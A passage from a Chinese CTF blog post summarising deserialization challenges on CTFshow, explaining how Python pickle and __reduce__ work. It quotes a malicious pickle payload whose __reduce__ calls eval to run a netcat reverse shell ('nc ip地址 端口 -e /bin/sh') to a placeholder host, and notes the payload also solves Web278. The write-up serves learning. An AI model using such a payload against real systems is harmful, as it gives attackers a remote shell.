<p>在这个代码片段中，pickle.loads()是pickle模块中的函数，用于反序列化（将字节流转换回对象）。m是一个字节流（序列化后的对象），通过调用pickle.loads(m)，我们将字节流m反序列化为原始的Python对象。</p>
</blockquote>
<blockquote>
<p>换句话说，这行代码的作用是将通过pickle.dumps()序列化后的对象重新转换回原始的Python对象。</p>
</blockquote>
<blockquote>
<p>序列化是将对象转换为可以在网络上传输或存储的字节流的过程。在Python中，pickle模块提供了序列化和反序列化的功能。</p>
</blockquote>
<blockquote>
<p>pickle模块提供了两个主要的方法来进行序列化：</p>
</blockquote>
<blockquote>
<p>pickle.dumps(obj)：将Python对象obj序列化为一个字节流（bytes）。它返回一个表示序列化对象的字节流，可以将其存储到文件或通过网络传输。</p>
</blockquote>
<p>有关pickle反序列化：</p>
<blockquote>
<p>在Python中，使用pickle模块进行反序列化时，会调用对象的__reduce__()方法来确定对象的重新构建方式。<strong>reduce</strong>()方法返回一个元组，其中第一个元素是要调用的函数，而后续元素是该函数的参数。</p>
<p>在你提供的代码中，CTFshow类的__reduce__()方法返回了一个元组，其中第一个元素是eval函数，而后续元素是一个包含要执行的代码的字符串。因此，当调用pickle.loads()或pickle.load()来反序列化数据时，它会调用eval函数，并将字符串”<strong>import</strong>(‘os’).popen(‘nc ip地址 端口 -e &#x2F;bin&#x2F;sh’).read()”作为代码进行执行。</p>
<p>这段代码的目的是通过反序列化来执行恶意命令，打开一个与指定IP地址和端口的远程主机的网络连接，并执行&#x2F;bin&#x2F;sh（Shell）命令。这是一种危险的行为，因为它允许攻击者在你的系统上执行任意命令。</p>
</blockquote>
<blockquote>
<p>对于反序列化过程来说，不需要定义与序列化时相同的类。在Python中，pickle模块会使用序列化数据中的信息来重建对象。当进行反序列化时，pickle会调用对象的__reduce__()方法（如果定义了的话），以确定对象的重新构建方式。</p>
</blockquote>
<blockquote>
<p>在你的代码中，虽然没有提供CTFshow类的定义，但在反序列化过程中，pickle模块会使用序列化数据中的信息调用__reduce__()方法，并执行返回的函数以重新构建对象。因此，尽管没有CTFshow类的定义，但仍然可以成功反序列化，并执行eval函数调用。</p>
</blockquote>
<blockquote>
<p>__reduce__()方法的相关内容会被写入序列化的字节流中。当调用pickle.dumps()或pickle.dump()将对象序列化为字节流时，pickle模块会将对象的类型、属性和__reduce__()方法返回的信息一起写入字节流中。</p>
</blockquote>
<blockquote>
<p>在反序列化过程中，pickle模块会读取字节流并根据其中的信息来重建对象。它会查找对象的类型信息，并调用__reduce__()方法来获取对象的重新构建方式。因此，<strong>reduce</strong>()方法的返回值会在反序列化过程中被解析和使用。</p>
</blockquote>
<blockquote>
<p>dump()函数用于将对象序列化为字节流，并将其写入文件或类似对象的流中<br>dumps()函数用于将对象序列化为字符串，并返回序列化后的字符串。</p>
</blockquote>

        <h3 id="Web278"   >
          <a href="#Web278" class="heading-link"><i class="fas fa-link"></i></a><a href="#Web278" class="headerlink" title="Web278"></a>Web278</h3>
      <p>上面那个payload照样能打</p>

        <h3 id="总结一下"   >
          <a href="#总结一下" class="heading-link"><i class="fas fa-link"></i></a><a href="#总结一下" class="headerlink" title="总结一下"></a>总结一下</h3>
      <p>感觉CTFSHOW上的反序列化题目还比较无聊，没有太大的收获，反序列化暂且告一段落，学java和nodejs去了，两块硬骨头</p>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ END ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">Author: </span><span class="copyright-author__value"><a href="http://yan5ui.github.io">yansui</a></span></div><div class="copyright-link"><span class="copyright-link__name">Link: </span><span class="copyright-link__value"><a href="http://yan5ui.github.io/2023/07/08/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%80%BB%E7%BB%93/">http://yan5ui.github.io/2023/07/08/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%80%BB%E7%BB%93/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">Copyright: </span><span class="copyright-notice__value">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> unless stating additionally</span></div></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2023/07/12/Java/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">CTF:JAVA Web学习记录与总结</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2023/06/30/XSS%E6%80%BB%E7%BB%93/"><span class="paginator-prev__text">XSS基础</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><section class="sidebar-toc hide"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%80%BB%E7%BB%93"><span class="toc-number">1.</span> <span class="toc-text">
          PHP反序列化总结</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E3%80%81PHP%E5%89%8D%E7%BD%AE%E5%9F%BA%E7%A1%80"><span class="toc-number">1.1.</span> <span class="toc-text">
          一、PHP前置基础</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E3%80%81PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AE%80%E4%BB%8B"><span class="toc-number">1.2.</span> <span class="toc-text">
          二、PHP反序列化简介</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F%E4%B8%BA%E4%BB%80%E4%B9%88%E5%AD%98%E5%9C%A8%E6%BC%8F%E6%B4%9E%EF%BC%9F"><span class="toc-number">1.2.1.</span> <span class="toc-text">
          1.反序列化是什么？为什么存在漏洞？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E5%85%B3%E4%BA%8E%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95"><span class="toc-number">1.2.2.</span> <span class="toc-text">
          2.关于魔术方法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E5%85%B3%E4%BA%8E%E7%B1%BB%E4%B8%AD%E4%B8%8D%E5%90%8C%E7%B1%BB%E5%9E%8B%E7%9A%84%E5%B1%9E%E6%80%A7"><span class="toc-number">1.2.3.</span> <span class="toc-text">
          3.关于类中不同类型的属性</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E3%80%81CTFShow%E9%A2%98%E8%A7%A3"><span class="toc-number">1.3.</span> <span class="toc-text">
          二、CTFShow题解</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Web254"><span class="toc-number">1.3.1.</span> <span class="toc-text">
          Web254</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web255"><span class="toc-number">1.3.2.</span> <span class="toc-text">
          Web255</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web256"><span class="toc-number">1.3.3.</span> <span class="toc-text">
          Web256</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web257"><span class="toc-number">1.3.4.</span> <span class="toc-text">
          Web257</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web258"><span class="toc-number">1.3.5.</span> <span class="toc-text">
          Web258</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web259"><span class="toc-number">1.3.6.</span> <span class="toc-text">
          Web259</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web260"><span class="toc-number">1.3.7.</span> <span class="toc-text">
          Web260</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web261"><span class="toc-number">1.3.8.</span> <span class="toc-text">
          Web261</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web262"><span class="toc-number">1.3.9.</span> <span class="toc-text">
          Web262</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web263"><span class="toc-number">1.3.10.</span> <span class="toc-text">
          Web263</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web264"><span class="toc-number">1.3.11.</span> <span class="toc-text">
          Web264</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web265"><span class="toc-number">1.3.12.</span> <span class="toc-text">
          Web265</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web266"><span class="toc-number">1.3.13.</span> <span class="toc-text">
          Web266</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web267"><span class="toc-number">1.3.14.</span> <span class="toc-text">
          Web267</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web268"><span class="toc-number">1.3.15.</span> <span class="toc-text">
          Web268</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web269"><span class="toc-number">1.3.16.</span> <span class="toc-text">
          Web269</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web270"><span class="toc-number">1.3.17.</span> <span class="toc-text">
          Web270</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web271"><span class="toc-number">1.3.18.</span> <span class="toc-text">
          Web271</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web272"><span class="toc-number">1.3.19.</span> <span class="toc-text">
          Web272</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web273"><span class="toc-number">1.3.20.</span> <span class="toc-text">
          Web273</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web274"><span class="toc-number">1.3.21.</span> <span class="toc-text">
          Web274</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web275"><span class="toc-number">1.3.22.</span> <span class="toc-text">
          Web275</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web276"><span class="toc-number">1.3.23.</span> <span class="toc-text">
          Web276</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web277"><span class="toc-number">1.3.24.</span> <span class="toc-text">
          Web277</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web278"><span class="toc-number">1.3.25.</span> <span class="toc-text">
          Web278</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%BB%E7%BB%93%E4%B8%80%E4%B8%8B"><span class="toc-number">1.3.26.</span> <span class="toc-text">
          总结一下</span></a></li></ol></li></ol></li></ol></section><!-- ov = overview--><section class="sidebar-ov"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="/uploads/photo.jpg" alt="avatar"></div><p class="sidebar-ov-author__text">yansui</p></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" target="_blank" rel="noopener" data-popover="Creative Commons" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">You have read </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="/js/utils.js?v=2.8.0"></script><script src="/js/stun-boot.js?v=2.8.0"></script><script src="/js/scroll.js?v=2.8.0"></script><script src="/js/header.js?v=2.8.0"></script><script src="/js/sidebar.js?v=2.8.0"></script></body></html>